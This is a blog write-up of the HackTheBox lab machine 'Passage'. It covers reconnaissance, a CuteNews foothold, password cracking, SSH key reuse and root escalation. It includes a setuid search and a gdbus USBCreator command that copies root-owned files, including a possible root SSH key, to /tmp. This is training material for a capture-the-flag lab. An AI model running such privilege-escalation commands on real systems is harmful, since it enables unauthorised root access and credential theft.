Open in app

Sign in

Write

Sign in

Hackthebox Passage Writeup

Jim Solomon
3 min readMar 6, 2021

Overview:

Passage is a medium level linux machine in Hackthebox, it comes with a vulnerable webserver CuteNews, when you use public exploits getting into the machine and crack some hashes in the CuteNews user folder there are user credentials that allow you to login to users. Finally, there is a dbus vulnerable service running under user nadav it you can exploit it to get a root flag or id_rsa. With all that being said, Let’s just jump in!

Reconnaissance:

# Nmap 7.91 scan initiated Fri Jan 29 17:32:54 2021 as: nmap -A -T4 -p- -oN all -v 10.10.10.206
Nmap scan report for 10.10.10.206
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
| 256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
|_ 256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Passage News
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

As nmap only shows two ports, So I will check port 80’s web server first.

checking CuteNews exploits and found this recent one.

The Foothold:

Great as we have the foodhold! Now, Let’s PriEsc!

base64 decode all the strings and head over to crackstation to crack all the passwords.

Use passwords we just cracked login into user Paul

Found ssh key for user dadav in Paul’s .ssh directory

Copy id_rsa key and SSH login to nadav’s account

PriEsc to root:

Check setuid bits in user nadav

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null

There is a dbus exploit and the box’s name also implies below exploit, you can read detailed explanation about this exploit. Now I’m going to try it out.

USBCreator D-Bus Privilege Escalation in Ubuntu Desktop

A vulnerability in the USBCreator D-Bus interface allows an attacker with access to a user in the sudoer group to…

unit42.paloaltonetworks.com

Run below command getting the root flag. You can get id_rsa login to root machine as well.

gdbus call — system — dest com.ubuntu.USBCreator — object-path /com/ubuntu/USBCreator — method com.ubuntu.USBCreator.Image /root/root.txt /tmp/root.txt true

We can see we got root.txt in ./tmp directory and it’s 33 characters :)

Patch the vulnerability:

  1. Update the Cutenews application on the web server.
  2. Remove the dbus service in the machine.
Passage Hackthebox
Writeup
Meduim
Dbus
Exploit

--

--

Jim Solomon

Written by Jim Solomon

4 Followers

Christian, Studying Cyber Security and Digital Forensics, Security Consultant at 12security.com | OSCP

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams